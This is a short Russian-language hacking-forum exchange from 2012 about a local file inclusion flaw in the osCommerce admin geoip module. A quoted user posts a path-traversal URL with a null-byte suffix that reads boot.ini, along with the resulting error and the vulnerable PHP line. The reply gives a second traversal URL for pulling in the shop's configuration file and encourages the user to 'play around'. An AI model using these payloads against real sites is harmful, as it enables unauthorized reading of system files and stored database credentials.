15.06.2012, 05:00
|
|
Познающий
Регистрация: 10.09.2009
Сообщений: 40
Провел на форуме:
72737
Репутация:
1
|
|
Сообщение от Pirotexnik
Pirotexnik said:
Нашел LFI, но незнаю как реализовать...
http://localhost/oscommerce/admin/includes/applications/modules_geoip/pages/edit.php?module=../../../../../../../../../../../../../../../../../boot.ini%00
Все бы хорошо, но помимо
include()
эта переменная используется еще где-то:
Код:
Code:
Fatal error: Call to a member function loadIniFile() on a non-object in C:\web\htdocs\oscommerce\admin\includes\applications\modules_geoip\pages\edit.php on line 18
Код:
Code:
18: $osC_Language->loadIniFile('modules/geoip/' . $_GET['module'] . '.php');
Помогите http://localhost/oscommerce/admin/includes/applications/modules_geoip/pages/edit.php?module=../../../../../../../../../../../../../C:/web/htdocs/oscommerce/includes/conf не помню название конфига.php%00
Проинклудь конфиг, поиграйся.
|
|
|